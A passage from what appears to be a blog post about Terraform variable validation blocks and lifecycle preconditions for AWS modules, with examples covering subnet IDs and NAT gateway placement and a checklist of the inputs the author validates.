This accepts any subnet ID. Public, private, doesn't matter. Terraform won't complain. AWS won't complain (immediately). But your private subnets won't have internet access, and you'll spend time figuring out why.

The Fix: Validation Blocks

Variable validation blocks have been available since Terraform 0.13 (the startswith function used below requires 1.3 or later):

variable "public_subnet_ids" {
  description = "Public subnet IDs for NAT Gateway placement"
  type        = list(string)

  validation {
    condition     = length(var.public_subnet_ids) > 0
    error_message = "At least one public subnet ID is required."
  }

  validation {
    condition     = alltrue([for id in var.public_subnet_ids : startswith(id, "subnet-")])
    error_message = "All values must be valid subnet IDs (starting with 'subnet-')."
  }
}

Now terraform plan fails immediately with a clear message if someone passes an empty list or garbage values.

Going Further: Preconditions

For validations that need to check relationships between variables, use precondition blocks inside lifecycle (available since Terraform 1.2):

resource "aws_nat_gateway" "this" {
  count = var.single_nat_gateway ? 1 : length(var.public_subnet_ids)

  allocation_id = aws_eip.this[count.index].id
  subnet_id     = var.public_subnet_ids[count.index]

  lifecycle {
    precondition {
      condition     = var.single_nat_gateway || length(var.public_subnet_ids) >= length(var.private_route_table_ids)
      error_message = "When using multi-AZ NAT, you need at least as many public subnets as private route tables."
    }
  }
}

This catches architectural mistakes at plan time, not after a 10-minute apply.

What I Validate in Every Module

After building 12 Terraform modules for AWS, here's my checklist:

What	Why
Non-empty required lists	Prevents silent no-ops
ID format (`subnet-`, `vpc-`, `sg-`)	Catches copy-paste errors
CIDR block format	Regex validation on network inputs
Mutually exclusive flags	e.g., `single_nat_gateway` vs per-AZ mode
Cross-variable consistency	Preconditions on resource blocks

The Payoff

Every validation you add is one fewer support ticket, one fewer "why isn't this working" Slack message, and one fewer hour lost to debugging obvious misconfigurations.

The best part: these validations run during terraform plan. Zero cost. Zero risk. Just faster feedback.

Building Terraform modules for AWS? Check out the HAIT module collection on the Terraform Registry.